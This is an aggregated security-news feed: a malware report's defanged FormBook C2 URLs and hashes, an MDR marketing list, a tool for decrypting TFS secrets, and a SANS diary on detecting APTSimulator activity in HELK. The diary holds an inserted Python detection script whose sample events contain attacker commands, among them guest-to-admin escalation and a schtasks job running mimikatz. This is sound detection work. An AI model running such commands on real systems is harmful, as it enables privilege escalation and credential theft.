  • hxxp://www.cretezzy[.]com/do/ -> FormBook C2 server
  • hxxp://www.beemptty[.]com/se/ -> FormBook C2 server


The infrastructure sharing suggests that this is a common actor currently using two different stealers. Based on the timeline, we assume that the actor is currently moving from Pony to FormBook, another stealer.

Conclusion
This case shows us that malicious actors play with multiple file formats and embedded objects. In this campaign, the author used a PDF with an embedded Office document template using a vulnerability in order to download an additional Office RTF document, and then a second vulnerability and exploit in order to compromise the target. The attacker used an unfamiliar file-sharing platform in order to store the malicious document and a compromised WordPress site in order to store the final payload. We did notice that the file-sharing platform is reactive, removing the malicious files quickly, stopping the infection chain.

Some technical elements, such as infrastructure sharing, show us that the actor behind this campaign is probably the same actor behind a campaign we described one year ago. Last month, the actor used two stealers in parallel on the same infrastructure. Based on the information we have today, he/she no longer uses Pony, but has switched to FormBook in order to steal information from compromised systems.

Coverage
Additional ways our customers can detect and block this threat are listed below.
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

PDF
8f859c1a9965427848315e9456237e9c018b487e3bd1d632bce2acd0c370341e

Embedded And Attached dotm
04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c

Malicious Documents Hosted On The File Sharing Platform

PE32 Hosted On The irishlebanese Website

C2 Servers

Overlap Samples
Categories: Security Posts

Network Innovation Day 2018: Conferencias en vídeo disponibles online #NID2018

Un informático en el lado del mal - Wed, 2018/06/20 - 15:44
El pasado 14 de Junio nos paramos en Telefónica para hablar de nuestros trabajos en la red durante la celebración del Network Innovation Day. Hablamos de lo que hacemos con BigData, con Seguridad Informática, con Machine Learning o Quantum Computing durante una mañana, para explicar a nuestros clientes nuestros "internals" con las Self Organized Networks, con Software Defined Networks o Network Function Virtualization.

Figura 1: Network Innovation Day 2018: Conferencias en vídeo disponibles online #NID2018
That day, the heads of many of the company's technology areas spoke, such as Guillermo Ansaldo, Enrique Blanco, David del Val, Francisco Montalvo, Pedro Pablo Pérez and our board member Ignacio Cirac, who gave a very special talk on the project for encrypting network communications using Quantum Computing.

Figure 3: Network Innovation Day 2018 Full Event
The videos, together with all the presentations, are now available online. On the Network Innovation Day 2018 website you can follow the agenda and download the presentations while watching the session that interests you most.
Today, with the great Ignacio Cirac, who besides being a unique scientist is an even better person. A post shared by Chema Alonso (@chemaalonso) on Jun 14, 2018 at 1:49am PDT
With my colleague, the great Enrique Blanco, closing our Network Innovation Day event. Enrique is our Global CTIO, responsible for Telefónica's network and its systems. He is the one who looks after me and calls me the intern. Admiration for him. A post shared by Chema Alonso (@chemaalonso) on Jun 14, 2018 at 9:21am PDT
It was a very special day, so I took the opportunity to have my photo taken with many of the other speakers and friends, since there are few occasions like this, where we all stand in front of our customers to talk about things we like so much. These are days of joy for everyone.
Another moment from this past week: the opening keynote of Network Innovation Day 2018 #nid2018 with the legendary Guillermo Ansaldo (this time without his rocker outfit) }:) A post shared by Chema Alonso (@chemaalonso) on Jun 16, 2018 at 10:24pm PDT
A photo for my personal memories. Enrique Blanco - Global CTIO of Telefónica -, David Cervigón - Cloud Solutions Architect at Microsoft -, Ignacio Cirac - Prince of Asturias Award winner - and David del Val - Director of Product Innovation at Telefónica -. Great professionals and colleagues. I could spend a long time talking about them, but the truth is that sometimes I feel like I am in an amusement park, getting to enjoy my work every day because I am close to people of their calibre. A post shared by Chema Alonso (@chemaalonso) on Jun 14, 2018 at 9:31pm PDT
The sessions are all short, since we wanted the event to be very dynamic, so each one lasts between 5 and 20 minutes - the opening presentation - at most. This lets you, if you wish, work through the event bit by bit in your spare moments.
Malignant greetings!
Categories: Security Posts

10 Opportunities for MSPs and MSSPs to Deliver MDR Services

AlienVault Blogs - Wed, 2018/06/20 - 15:00
The proliferation of cybersecurity attacks and greater adoption of cloud applications and services is proving that traditional, prevention-only approaches are ineffective. Instead, organizations are focusing more on a detection and response strategy to manage their cybersecurity risk. However, staying up to date with the latest cybersecurity risks, managing multiple point security products, and finding skilled security resources is proving too challenging for many organizations that are instead looking to invest in Managed Detection and Response (MDR) services from their service providers, including MSPs and MSSPs. For service providers, the MDR trend creates an opportunity to stay competitive and add value that helps clients defend and respond to cyber threats. Here are 10 opportunities to embrace and deliver competitive MDR services:
  1. Provide 24-hour monitoring: Most organizations today are online and continuously connected, but many do not have the resources to monitor their IT security across all hours of every day. Offering round-the-clock monitoring takes the burden off resource constrained organizations, and helps reduce their cybersecurity risk both during and outside of regular business hours.
  2. Monitor cloud environments and applications: Many organizations are considering, or have already begun, the drive towards deploying infrastructure in the cloud or even using cloud applications for workloads like e-mail, collaboration, CRM, payroll, identity, and more. However, traditional security tools and existing expertise lack the capability and know-how of monitoring these environments, creating an increasing opportunity for service providers to help organizations on their respective journeys to the cloud.
  3. Identify the attack surface with asset discovery: The assets deployed across an organization’s environment represent the surface against which a malicious entity will conduct one or more attacks. With that in mind, a common challenge for IT and security teams—both in terms of managing cost and cybersecurity risk—is keeping track of what assets are deployed and where. Particularly given the ease and speed with which new virtual machines can be created in virtualized and cloud environments, keeping track of any changes is critical. Service providers can solve this problem for clients by including asset discovery in their MDR services, providing awareness and visibility into all assets on-premises and in the cloud.
  4. Perform vulnerability scanning: Finding and addressing vulnerabilities is critical because they are often exploited to deliver zero-day threats and ransomware, and it’s no surprise to see regular vulnerability scanning a requirement for compliance with many regulations. Once you know where all assets are in the environment, the next logical step is to assess them for vulnerabilities which, given that an average of 14 vulnerabilities are discovered each month, needs to be performed regularly. While some customers may wish to patch systems on their own, service providers can also offer vulnerability remediation, namely the application of available patches, as an additional service. 
  5. Provide log management: Identifying risks and attacks requires analyzing events and logs, and being able to determine the root cause of an attack typically requires piecing together events from across multiple systems. The manual approach of collecting logs from individual systems is resource intensive, and that’s assuming the device still has the logs for the desired timeframe. Service providers can offer a better way with log management, automating the collection of events and logs into a central location, normalizing the log data for easier analysis and investigation, and storage of the data for at least one year to help customers satisfy any regulatory or standards-based log retention requirements (e.g. for PCI DSS), and for security best practice. 
  6. Offer advanced intrusion detection and security analysis: These facilitate the rapid detection of threats across customers’ on-premises and cloud environments and applications. Host IDS and file integrity monitoring (FIM), network IDS, and cloud IDS can all offer early warning of attacks and unauthorized activities. Additionally, advanced correlation—including the use of machine learning and behavioral monitoring—can accurately identify threats that may not be clearly apparent to traditional defenses.
  7. Provide threat intelligence and context: To get the latest cyber threat indicators and context, some organizations opt to do their own research and analyze threat intelligence on their own, and some choose to acquire threat intelligence from a third party. Both of these approaches often prove too expensive for many organizations, both in up-front cost and time, especially considering that some have to procure multiple commercial threat intelligence feeds to meet their needs. Service providers who offer threat intelligence as part of their portfolio will have a distinct advantage: they can be proactive against new threats, have the right context on threats so that they can deliver optimal protection and response, and quickly show their customers that they are knowledgeable about the who, what, why and when questions that surround cyber threats.
  8. Deliver incident validation and response: Once an incident has been detected, the first step is to validate whether it is an actual threat or just noise, which often requires advanced knowledge and experience. The next step is delivering relevant information about each threat—what it is, its strategy and method, its origin and target, the threat actor, and the recommended response. While some organizations may wish to respond on their own, there is an accelerating trend for service providers to contain and/or fully remediate incidents, as well as perform post-incident forensics to identify the root cause.
  9. Deliver backup and recovery capabilities: The simplest form of business continuity, but one that is often poorly implemented across many organizations, is backup and recovery. This provides opportunity for service providers to deliver verified backup, along with the option to fully or partially recover systems and data, in the event of an outage or loss such as from a ransomware attack. Service providers can choose to offer additional business continuity services, such as the provision of warm and hot sites, as additional differentiators.
  10. Provide security consultation: Organizations often invest in disparate protection tools that don’t always work together, that require expertise they lack, or that may not be adequate for the environments they are trying to protect. This is exacerbated by the lack of skilled talent on the market, and new challenges such as protecting cloud and mobile assets. Service providers can address this space by offering consulting services to guide customers on understanding their environment, identify where there are risks, and helping develop and implement a cybersecurity management plan. In addition, service providers can offer training services, such as how customers can recognize phishing attacks, and how to respond if they discover them.
To accelerate your managed security services with AlienVault Unified Security Management, visit www.alienvault.com/partners. 
Categories: Security Posts

Microcode in pictures

Hex blog - Fri, 2018/06/15 - 23:07
Since a picture is worth a thousand words, below are a few drawings for your perusal. Let us start at the top level, with the mbl_array_t class, which represents the entire microcode object: The above picture does not show the control flow graph. For that we use predecessor and successor lists: Pay attention to the block …
Categories: Security Posts

Introducing Team Foundation Server decryption tool

Fox-IT - Thu, 2018/05/17 - 13:06
During penetration tests we sometimes encounter servers running software that uses sensitive information as part of the underlying process, such as Microsoft’s Team Foundation Server (TFS). TFS can be used for developing code, version control and automatic deployment to target systems. This blogpost provides two tools to decrypt sensitive information that is stored in the TFS database.

Decrypting TFS secrets

Within Team Foundation Server (TFS), it is possible to automate the build, testing and deployment of new releases. With the use of variables it is possible to create a generic deployment process once and customize it per environment [1]. Sometimes specific tasks need a set of credentials or other sensitive information and therefore TFS supports encrypted variables. With an encrypted variable the contents of the variable are encrypted in the database and not visible to the user of TFS. However, with sufficient access rights to the database it is possible to decrypt the encrypted content. Sebastian Solnica wrote a blogpost about this, which can be read at the following link: https://lowleveldesign.org/2017/07/04/decrypting-tfs-secret-variables/ [2]

Fox-IT wrote a PowerShell script that uses the information mentioned in the blogpost. While the blogpost mainly focused on the decryption technique, the PowerShell script is built with usability in mind. The script will query all needed values and display the decrypted values. An example can be seen in the following screenshot.

The script can be downloaded from Fox-IT’s GitHub repository: https://github.com/fox-it/Decrypt-TFSSecretVariables

It is also possible to use the script in Metasploit. Fox-IT wrote a post module that can be used through a meterpreter session. The result of the script can be seen in the screenshot below. There is a pull request pending and hopefully the module will be part of the Metasploit Framework soon.

The pull request can be found here: https://github.com/rapid7/metasploit-framework/pull/9930

References
[1] https://docs.microsoft.com/en-us/vsts/build-release/concepts/definitions/release/variables?view=vsts&tabs=batch
[2] https://lowleveldesign.org/2017/07/04/decrypting-tfs-secret-variables
Categories: Security Posts

Fabricating a Trellis

Niels Provos - Fri, 2018/05/04 - 06:10

The garden needed some trellises for roses. We came up with a circle design and are fabricating it in the shop. Mild steel bar is bent into many different ring sizes and then put together into a fairly large trellis. I am also showing some really beautiful slow motion shots of welding and grinding in high dynamic range.
Categories: Security Posts

An Elaborate Hack Shows How Much Damage IoT Bugs Can Do

Wired: Security - Mon, 2018/04/16 - 19:00
Rube-Goldbergesque IoT hacks are surprisingly simple to pull off—and can do a ton of damage.
Categories: Security Posts

How Russian Facebook Ads Divided and Targeted US Voters Before the 2016 Election

Wired: Security - Mon, 2018/04/16 - 15:00
New research shows just how prevalent political advertising was from suspicious groups in 2016—including Russian trolls.
Categories: Security Posts

Infocon: green

SANS Internet Storm Center, InfoCON: green - Fri, 2018/04/06 - 17:46
ISC Stormcast For Friday, April 6th 2018 https://isc.sans.edu/podcastdetail.html?id=5943
Categories: Security Posts

ISC Stormcast For Friday, April 6th 2018 https://isc.sans.edu/podcastdetail.html?id=5943, (Fri, Apr 6th)

SANS Internet Storm Center, InfoCON: green - Fri, 2018/04/06 - 03:30
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Threat Hunting & Adversary Emulation: The HELK vs APTSimulator - Part 1, (Thu, Apr 5th)

SANS Internet Storm Center, InfoCON: green - Thu, 2018/04/05 - 19:26

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our theme. I'm having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, is worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, the Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. This...is...Death Battle! Now with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not to undervalue these two offerings.
HELK is incredibly easy to install. It's also well documented, with lots of related reading material; let me propose that you take the time to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review installation steps.
On an Ubuntu 16.04 LTS system I ran:
git clone https://github.com/Cyb3rWard0g/HELK.git
cd HELK/
sudo ./helk_install.sh 
Of the three installation options I was presented with, pulling the latest HELK Docker Image from cyb3rward0g dockerhub, building the HELK image from a local Dockerfile, or installing the HELK from a local bash script, I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you: if you haven't installed Docker, the HELK install script does it for you. You can observe the entire install process in Figure 1.
Figure 1: HELK Installation
You can immediately confirm your clean installation by navigating to your HELK KIBANA URL, in my case http://192.168.248.29.
For my test Windows system I created a Windows 7 x86 virtual machine with Virtualbox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important, is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify and copy this to your target systems. The critical modification is line 123, under Kafka output, where you need to add the IP address for your HELK server in three spots. My modification appeared as hosts: ["192.168.248.29:9092","192.168.248.29:9093","192.168.248.29:9094"]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
./winlogbeat -c winlogbeat.yml -e
./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. If you're doing so with your initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml. This will ensure rich data returns from Sysmon, when using adversary emulation services from APTSimulator, as we will, or experiencing the real deal.
With all set up and working you should see results in your Kibana dashboard as seen in Figure 2.
Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOC's response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities, if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection, it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  • Creating typical attacker working directory C:\TMP...
  • Activating guest user account
    • Adding the guest user to the local administrators group
  • Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  • Modifying the hosts file
    • Adding update.microsoft.com mapping to private IP address
  • Using curl to access well-known C2 addresses
    • C2: msupdater.com
  • Dropping a Powershell netcat alternative into the APT dir
  • Executes nbtscan on the local network
  • Dropping a modified PsExec into the APT dir
  • Registering mimikatz in At job
  • Registering a malicious RUN key
  • Registering mimikatz in scheduled task
  • Registering cmd.exe as debugger for sethc.exe
  • Dropping web shell in new WWW directory
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub pages.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop the correct version of 7-Zip for your system architecture; I'm assuming the default bits are 64-bit, and I was testing on a 32-bit VM. Let's do a fast run-through with HELK's Kibana Discover option looking for the above mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above; see for yourself in Figure 3.
Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.
Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.
Figure 5: I've got your svchost right here
Knock #3 off the to-do, including the process.commandline, process.name, and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.
Figure 6: tasks OR schtasks
I think you get the point, there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines, use it to your advantage (Figure 7).
Figure 7: Timelion
Finally, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default, these are pretty basic, but you can quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially, it yielded a donut graph inclusive of malman (my pwned user), SYSTEM and LOCAL SERVICE. That was not detailed enough to be particularly useful, so I added a sub-bucket to include process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 of those were specific to cmd.exe processes, or 18.6% (Figure 8).
Figure 8: Powerful visualization capabilities
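The Discover searches in Figures 3 through 6 and the user/process sub-bucket in Figure 8 can be reproduced outside Kibana for testing detection logic before it is promoted to a rule. The block below is an added example and is not code from this diary, from HELK or from APTSimulator: it parses a handful of constructed Sysmon-style events (the kind Winlogbeat ships to HELK via Kafka), matches them against the APTSimulator activities enumerated above, keyed by their position in that list, and then computes the per-user process breakdown. The flattened field names (event_id, user, process.name, process.commandline, process.image, file.path, file.creationtime, registry.path) are an assumed subset of the HELK schema, and every event is constructed sample data, not captured from a real host.

```python
"""Hunt for the APTSimulator artefacts listed above in Sysmon events, then
build the per-user process breakdown from the Visualize section.

Added example: this is not code from the ISC diary, HELK or APTSimulator.
The event fields (event_id, user, process.name, process.commandline,
process.image, file.path, file.creationtime, registry.path) are a constructed,
flattened subset of what Winlogbeat ships to HELK (assumption), and the events
themselves are constructed sample data, not captured from a real host.
"""
import json
from collections import Counter, defaultdict

# Constructed sample events, one JSON document per line. event_id follows
# Sysmon: 1 = process create, 11 = file create, 13 = registry value set.
SAMPLE_EVENTS = r"""
{"event_id": 11, "user": "malman", "process.name": "powershell.exe", "file.path": "C:\\TMP\\nc.ps1", "file.creationtime": "2018-04-05T10:01:00Z"}
{"event_id": 1, "user": "malman", "process.name": "net.exe", "process.commandline": "net user guest /active:yes"}
{"event_id": 1, "user": "malman", "process.name": "net.exe", "process.commandline": "net localgroup administrators guest /add"}
{"event_id": 1, "user": "malman", "process.name": "svchost.exe", "process.image": "C:\\Users\\Public\\svchost.exe", "process.commandline": "svchost.exe"}
{"event_id": 11, "user": "malman", "process.name": "cmd.exe", "file.path": "C:\\Windows\\System32\\drivers\\etc\\hosts", "file.creationtime": "2018-04-05T10:02:00Z"}
{"event_id": 1, "user": "malman", "process.name": "schtasks.exe", "process.commandline": "schtasks /create /tn Updater /tr C:\\TMP\\mimikatz.exe /sc daily"}
{"event_id": 13, "user": "malman", "process.name": "reg.exe", "registry.path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger"}
{"event_id": 1, "user": "malman", "process.name": "cmd.exe", "process.commandline": "cmd.exe /c dir C:\\TMP"}
{"event_id": 1, "user": "SYSTEM", "process.name": "svchost.exe", "process.image": "C:\\Windows\\System32\\svchost.exe", "process.commandline": "svchost.exe -k netsvcs"}
{"event_id": 1, "user": "LOCAL SERVICE", "process.name": "svchost.exe", "process.image": "C:\\Windows\\System32\\svchost.exe", "process.commandline": "svchost.exe -k LocalService"}
"""


def _field(event, name):
    """Lower-cased string value of a field, '' when the field is absent."""
    return str(event.get(name, "")).lower()


# Rules keyed by the item number in the APTSimulator activity list above.
# Each predicate mirrors one of the Kibana Discover searches in the diary.
RULES = {
    1: ("file created under C:\\TMP",
        lambda e: e["event_id"] == 11 and _field(e, "file.path").startswith("c:\\tmp\\")),
    2: ("guest account enabled or added to local Administrators",
        lambda e: e["event_id"] == 1 and _field(e, "process.name") == "net.exe"
        and ("guest /active:yes" in _field(e, "process.commandline")
             or ("localgroup administrators" in _field(e, "process.commandline")
                 and "/add" in _field(e, "process.commandline")))),
    3: ("svchost.exe running from C:\\Users\\Public",
        lambda e: e["event_id"] == 1 and _field(e, "process.name") == "svchost.exe"
        and _field(e, "process.image").startswith("c:\\users\\public\\")),
    4: ("hosts file written",
        lambda e: e["event_id"] == 11 and _field(e, "file.path").endswith("\\drivers\\etc\\hosts")),
    11: ("scheduled task or At job created",
         lambda e: e["event_id"] == 1
         and (_field(e, "process.name") == "at.exe"
              or ("schtasks" in _field(e, "process.commandline")
                  and "/create" in _field(e, "process.commandline")))),
    12: ("debugger registered for sethc.exe under IFEO",
         lambda e: e["event_id"] == 13
         and "image file execution options\\sethc.exe" in _field(e, "registry.path")),
}


def parse_events(text):
    """Parse newline-delimited JSON into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def hunt(events):
    """Return {item_number: [matching events]} for every rule that fired."""
    hits = defaultdict(list)
    for event in events:
        for number, (_label, predicate) in RULES.items():
            if predicate(event):
                hits[number].append(event)
    return dict(hits)


def process_breakdown(events, user):
    """Per-user sub-bucket as in Figure 8: a Counter of process.name for
    `user` and the percentage of that user's events belonging to cmd.exe."""
    names = Counter(e.get("process.name", "") for e in events if e.get("user") == user)
    total = sum(names.values())
    share = round(100.0 * names["cmd.exe"] / total, 1) if total else 0.0
    return names, share


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    for number, matched in sorted(hunt(events).items()):
        print(f"strike #{number}: {RULES[number][0]} ({len(matched)} event(s))")
    names, share = process_breakdown(events, "malman")
    print(f"malman: {sum(names.values())} events, cmd.exe {share}%")
```

Each predicate is deliberately narrow (event type plus path or command-line substring) so that the two legitimate svchost.exe launches from System32 in the sample do not fire item 3; the same shape translates directly into a Kibana query such as process.name:svchost.exe AND NOT process.image:C\:\\Windows\\*. The untested rule is the one the diary warns about: run the sample through it before trusting it.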
I am thrilled with both HELK and APTSimulator. The true principles of blue team and detection quality are innate in these projects. The fact that Roberto considers HELK still in alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's Advanced Solutions as well, there's more than one way to emulate an adversary.
Part 2 will explore HELK integration with Spark, Graphframes & Jupyter notebooks.
Russ McRee | @holisticinfosec (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts
